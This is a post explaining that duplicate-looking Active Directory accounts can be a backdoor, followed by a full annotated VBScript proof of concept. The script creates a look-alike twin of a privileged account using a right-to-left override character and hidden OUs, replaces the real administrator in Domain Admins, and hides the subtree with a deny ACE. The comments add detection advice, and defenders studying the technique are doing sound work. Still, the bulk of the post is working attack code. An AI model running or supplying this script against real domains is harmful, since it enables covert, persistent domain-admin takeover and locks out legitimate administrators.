Why are there duplicate Active Directory accounts?
Why do accounts double?
What does this mean in terms of security?
If a malicious explanation is considered, this is a compromise: a backdoor account.
The second account's stored name is g_nimdAceTmoC, preceded by a Unicode right-to-left override character (U+202E, `ChrW(8238)` in the script below). Because the override reverses the rendering direction, the stored string displays as ComTecAdmin_g and is visually indistinguishable from the real account, while the stored bytes (and therefore sorting, searching and the SID) differ.
The trick is used to hide a new, attacker-controlled principal in plain sight: in group membership and access control lists it looks like a second copy of a known name rather than a new user. Treat it as an incident rather than a replication glitch: check who created the object and when, search for names containing U+202E or U+0080, for user objects with showInAdvancedViewOnly=TRUE, for unexpected deny ACEs granted to Everyone on OUs, and confirm that the real administrator has not been removed from the privileged group (the script below does exactly that swap).
For more details, see the webinar "Penetration Testing in Microsoft Networks" (Dmitry Evteev, Head of Security Analysis Department, Positive Technologies, 15 March 2012, 14:00), or the recording at my.comdi.com/record/46030.
Update, January 17, 2015: I found Dmitry Evteev's paper on Exploit-DB; it contains the script that creates an account which looks like a duplicate of an existing one (reproduced below, annotated).
www.exploit-db.com/wp-content/themes/exploit/docs/...
Article in Russian:
devteev.blogspot.ru/2012/01/backdoor-active-direct...
' Top-level script: creates a look-alike "twin" of an existing privileged account and
' swaps it into the admins group in place of the real one. This is a published
' proof-of-concept backdoor; it is annotated here so that the artefacts it leaves
' behind can be recognised by defenders. Every step below is a side effect against
' the live directory of the current machine's domain.
'
' Error handling is switched off for the whole script: a failing step is skipped
' silently instead of aborting, so a partially applied result is possible and no
' diagnostics are produced.
On Error Resume Next
' Account to clone, group to place the twin in, and the twin's password.
' NOTE: the password literal below appears to have been mangled by an e-mail
' obfuscation filter when the page was scraped; it is not the original value.
strAdminsamAccountName = "dmitry.ivanov"
strAdminsGroup = "Domain Admins"
strPassNewUser = "[email protected]"
'---
' arrContainer / i are script-level and are filled by EnumOUs (defined below) with
' the OU names on the path from the cloned account up to the domain root.
Dim arrContainer(), i
' Resolve the domain's default naming context (e.g. DC=corp,DC=example) and bind to it.
Set objRootDSE = GetObject("LDAP://RootDSE")
strDomain = objRootDSE.Get("DefaultNamingContext")
Set objDomain = GetObject("LDAP://" & strDomain)
' Locate the account to clone by sAMAccountName. SearchDN (defined below) expects the
' argument to begin with the quote that closes its "LDAP://..." path, hence the
' leading "'" here.
strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" & strAdminsamAccountName & "'")
' NOTE(review): when nothing matches, SearchDN returns Empty, not Null, so this guard
' does not actually skip the block; the subsequent GetObject fails and is swallowed
' by On Error Resume Next.
If Not IsNull(strAdminsamAccountNameDN) Then
Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN)
Set objOU = GetObject(objAdmin.parent)
i=0
' Walk from the account's OU up to the domain root, collecting OU names:
' arrContainer(0) is the account's own OU, arrContainer(i-1) the top-most one.
Call EnumOUs(objOU)
' Re-create that OU chain top-down as a SEPARATE subtree. EnumOUs appends ChrW(128)
' (U+0080, a non-printing control character) to the top-most name, so the new chain
' has a different DN but displays the same in most tools.
For j = i-1 To 0 Step-1
if strContainer="" Then
strContainer = "OU=" & arrContainer(j) & strContainer
' Remember the top-most new OU; the deny ACE is applied there at the very end.
primaryContainer = strContainer
Else
strContainer = "OU=" & arrContainer(j) & "," & strContainer
End if
Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)
objOUcreate.SetInfo
Next
Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain)
' ChrW(8238) is U+202E RIGHT-TO-LEFT OVERRIDE. Prefixing the reversed string with it
' makes the stored name RENDER exactly like the original, while the stored
' cn/sAMAccountName bytes differ (and so do sorting, searching and the new SID).
Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName))
objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName)
' The object must exist before a password can be set, hence the early SetInfo.
objUserCreate.SetInfo
' (redundant: error suppression is already active for the whole script)
On Error Resume Next
objUserCreate.SetPassword strPassNewUser
' 66048 = 0x10200 = NORMAL_ACCOUNT (0x200) + DONT_EXPIRE_PASSWD (0x10000):
' an enabled account whose password never expires.
objUserCreate.Put "userAccountControl", 66048
' Copy the visible name attributes as well, each with the same RTL-override trick.
objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName)
objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn)
objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials)
objUserCreate.SetInfo
On Error Resume Next
' Hides the object from the default ADUC view (shown only with "Advanced Features").
' A user object with this attribute set is itself a useful detection hook.
objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
objUserCreate.SetInfo
On Error Resume Next
NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName
strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" & strAdminsGroup & "'")
If Not IsNull(strAdminsGroupDN) Then
Set objGroup = GetObject("LDAP://" & strAdminsGroupDN)
' PutEx 4 = ADS_PROPERTY_DELETE: the REAL account is removed from the group...
objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)
objGroup.SetInfo
' ...and PutEx 3 = ADS_PROPERTY_APPEND adds the twin in its place, so the member
' list still appears to contain the same name. Membership changes on the privileged
' group are the most reliable place to catch this.
objGroup.PutEx 3, "member", Array(NewUserDN)
objGroup.SetInfo
End If
' Finally restrict who can read the new OU subtree (see OUAddAce below).
OUAddAce(primaryContainer & "," & strDomain)
End If
' Looks up one object's distinguishedName with an ADO query through the ADSI OLE DB
' provider, searching the whole domain (Searchscope 2 = subtree).
'
' str  - tail of an SQL-dialect LDAP query; it must begin with the quote that closes
'        the "LDAP://<domain>" path, e.g. "' WHERE objectCategory='user' AND ...".
'        The value is concatenated into the query without escaping, so it is only
'        safe with the fixed, script-controlled strings used by this script.
' Uses the script-level strDomain as the search base.
' Returns the DN of the FIRST match. When there is no match the function is never
' assigned and returns Empty (not Null) -- callers testing with IsNull will not
' detect that case. The ADO connection is not closed explicitly; it is released when
' the local objects go out of scope.
Function SearchDN(str)
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand = CreateObject("ADODB.Command")
Set objCommand.ActiveConnection = objConnection
objCommand.Properties("Searchscope") = 2
objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" & strDomain & str
Set objRecordSet = objCommand.Execute
If Not objRecordSet.EOF Then
SearchDN = objRecordSet.Fields("distinguishedName").Value
End if
End Function
' Walks upward from objChild through its parents, appending each OU's name to the
' script-level arrContainer at index i (incremented once per level), so that
' arrContainer(0) is the starting OU and arrContainer(i-1) the top-most one.
'
' objChild - an organizationalUnit object bound via ADSI.
' Recursion stops at the first parent that is not an organizationalUnit (the domain
' head or a built-in container). That top-most OU name gets ChrW(128) (U+0080, a
' non-printing control character) appended, which is what lets the caller create a
' second OU hierarchy with a different DN but visually identical names.
Sub EnumOUs(objChild)
Dim objParent
Set objParent = GetObject(objChild.Parent)
If (objParent.Class = "organizationalUnit") Then
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou
i=i+1
Call EnumOUs(objParent)
Else
' Top of the OU chain: store a look-alike name with a hidden trailing character.
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou & ChrW(128)
i=i+1
End If
End Sub
' Appends an inheritable deny ACE for Everyone to the given OU's DACL and then flips
' the DACL "protected" control bit, so the new subtree no longer inherits permissions
' from its parent. Together with the look-alike names this is what keeps the twin
' account out of casual views.
'
' OU - distinguished name of the OU to modify (the caller passes the top-most
'      OU it created, qualified with the domain DN).
' ACE fields, as ADSI constants:
'   AceFlags   2  = ADS_ACEFLAG_INHERIT_ACE        -- inherited by child objects
'   AceType    6  = ADS_ACETYPE_ACCESS_DENIED_OBJECT -- object-specific deny
'   AccessMask 16 = ADS_RIGHT_DS_READ_PROP         -- deny reading properties
'   Flags      1  = ADS_FLAG_OBJECT_TYPE_PRESENT   -- ObjectType GUID is used
'   ObjectType    = E48D0154-... -- the rights GUID of the "Public Information"
'                   property set (name/display attributes); verify against the
'                   schema of the forest being examined.
' Note: objOU is not declared local, so this overwrites the script-level objOU.
' Returns nothing (the function value is never assigned).
Function OUAddAce(OU)
Dim objSdUtil, objSD, objDACL, objAce
Set objOU = GetObject ("LDAP://" & OU)
Set objSdUtil = GetObject(objOU.ADsPath)
Set objSD = objSdUtil.Get("ntSecurityDescriptor")
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject("AccessControlEntry")
objAce.Trustee = "Everyone"
objAce.AceFlags = 2
objAce.AceType = 6
objAce.AccessMask = 16
objAce.Flags = 1
objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
' AddAce appends at the end of the DACL; a deny ACE for Everyone on an OU is an
' unusual artefact worth alerting on.
objDacl.AddAce objAce
objSD.DiscretionaryAcl = objDacl
objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
objSDUtil.SetInfo
' Re-read the descriptor and toggle SE_DACL_PROTECTED (0x1000) in its control
' word. XOR flips the bit rather than setting it, so on an OU that was already
' protected this would UN-protect it; an Or would have been the deliberate form.
Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")
intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
objOU.SetInfo
End Function
What is this for? — An account is identified not by its name but by its SID (without going into details): two objects can display the same name and still be different security principals, each with its own password and group memberships. That is exactly what the script above exploits.